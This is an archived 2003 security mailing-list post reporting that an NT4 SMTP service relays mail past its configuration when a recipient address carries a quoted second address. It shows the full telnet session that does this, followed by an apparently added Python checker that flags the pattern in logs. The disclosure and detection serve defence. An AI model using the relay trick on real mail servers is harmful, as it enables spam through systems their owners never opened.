Can NT4 SMTP Service be misused for mail spamming
From: st0ff st0ff (if0ff_at_YAHOO.COM)
Date: 08/25/03
- Previous message: Russ: "Re: Administrivia #30766 - Russ Cooper's Internet Penalties Plan"
- Next in thread: eric_at_LIEGE.COM: "Re: Can NT4 SMTP Service be misused for mail spamming"
- Maybe reply: eric_at_LIEGE.COM: "Re: Can NT4 SMTP Service be misused for mail spamming"
Date: Mon, 25 Aug 2003 05:38:53 -0700
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Hi List
I became aware that it is possible to relay mails
on a fully patched NT4 box. The SMTP service, which is
part of the Option Pack, is the subject matter.
I've installed SP6a with the SRP Q299444 and the
newest IIS cumulative patch Q811114. The configuration
disallows relaying mails on this server, except for the
domain foobar.com.
If I send an email as follows, the mail is going to be
relayed:
> telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220-foobar.com Microsoft SMTP MAIL ready at Wed, 25 Aug 2003 10:50:27 +0200 Version: 5.5.1877.197.19
220 ESMTP spoken here
helo localhost
250 foobar.com Hello [2.2.2.2]
mail from: spammer@foo.com
250 spammer@foo.com....Sender OK
rcpt to: "victim@whatever.com"@foobar.com
250 "victim@whatever.com"@foobar.com
data
354 Start mail input; end with <CRLF>.<CRLF>
subject: spamtest
test
.
250 0892a4350054683343212 Queued mail for delivery
quit
221 foobar.com Service closing transmission channel
Connection closed by foreign host.
Is that a bug, a misconfiguration or did I miss a
patch?
Thanks a lot
if0ff
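
The relay decision at issue in the session above, as an added example that is not part of the original post and not Microsoft's code: a check that looks only at the domain after the final '@' accepts the quoted recipient, while a stricter check also inspects the unquoted local part. The function names, the LOCAL_DOMAINS set and the postmaster address are assumptions made for illustration.

```python
import re

LOCAL_DOMAINS = {"foobar.com"}  # assumption: the one domain the post's server accepts mail for

def split_rcpt(arg):
    """Split a RCPT TO argument into (local_part, domain) at the last '@' outside quotes."""
    addr = arg.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    in_quotes = escaped = False
    last_at = -1
    for i, ch in enumerate(addr):
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == '"':
            in_quotes = not in_quotes
        elif ch == "@" and not in_quotes:
            last_at = i
    if in_quotes or last_at < 1 or last_at == len(addr) - 1:
        raise ValueError("malformed address: %r" % arg)
    return addr[:last_at], addr[last_at + 1:].lower()

def strict_check(arg):
    """Hardened policy: local domain required, and no second address inside the local part."""
    try:
        local, domain = split_rcpt(arg)
    except ValueError:
        return False, "malformed"
    if domain not in LOCAL_DOMAINS:
        return False, "relay denied"
    if len(local) >= 2 and local[0] == local[-1] == '"':
        local = re.sub(r"\\(.)", r"\1", local[1:-1])  # strip quotes and escapes
    if "@" in local:
        return False, "embedded address in local part"
    return True, "ok"

def domain_only_check(arg):
    """Weak policy: accepts whenever the domain after the final '@' is local."""
    try:
        return split_rcpt(arg)[1] in LOCAL_DOMAINS
    except ValueError:
        return False

def flag_session(lines):
    """Return RCPT TO arguments that pass the weak check but fail the strict one."""
    rcpts = (m.group(1).strip() for m in
             (re.match(r"\s*rcpt to:\s*(.+)$", l, re.IGNORECASE) for l in lines) if m)
    return [r for r in rcpts if domain_only_check(r) and not strict_check(r)[0]]

# Constructed sample: two commands from the post plus one ordinary local recipient.
SAMPLE = ["mail from: spammer@foo.com",
          'rcpt to: "victim@whatever.com"@foobar.com',
          "rcpt to: postmaster@foobar.com"]
```

Running flag_session over SMTP protocol logs gives a quick audit of whether recipients of this shape have already been accepted by a server.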